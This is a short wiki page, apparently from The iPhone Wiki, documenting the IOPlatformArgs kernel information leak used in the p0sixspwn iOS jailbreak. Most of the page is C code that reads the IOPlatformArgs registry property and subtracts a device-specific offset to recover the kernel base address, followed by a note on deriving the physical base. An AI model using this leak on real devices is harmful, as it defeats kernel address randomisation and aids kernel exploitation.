IOPlatfromArgs leak

From The iPhone Wiki
Revision as of 18:14, 14 June 2014 by I3ppwn (talk | contribs)
Jump to: navigation, search

Vulnerability used in p0sixspwn This vulnerability leaks the kernel base address. This is the code

unsigned long getKernelBase() {
   unsigned long buf;
   io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("device-tree"));
   if(service)
   {
       CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
       if(macData != NULL)
       {
           /*
            void CFDataGetBytes (
            CFDataRef theData,
            CFRange range,
            UInt8 *buffer
            );
            */
           CFDataGetBytes(macData, CFRangeMake(0,sizeof(buf)), &buf); // TODO: buf != UInt8
           // XXX: TODO: change decrement based on device.
           // N90 ONLY FOR NOW!
           buf -= 0xE1C000; // Diff.
           CFRelease(macData);
           IOObjectRelease(service);
           return buf;
       }
       IOObjectRelease(service);
   }
   return 0; 
} // iH8sn0w

Once the attacker knows the virtual base, he can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug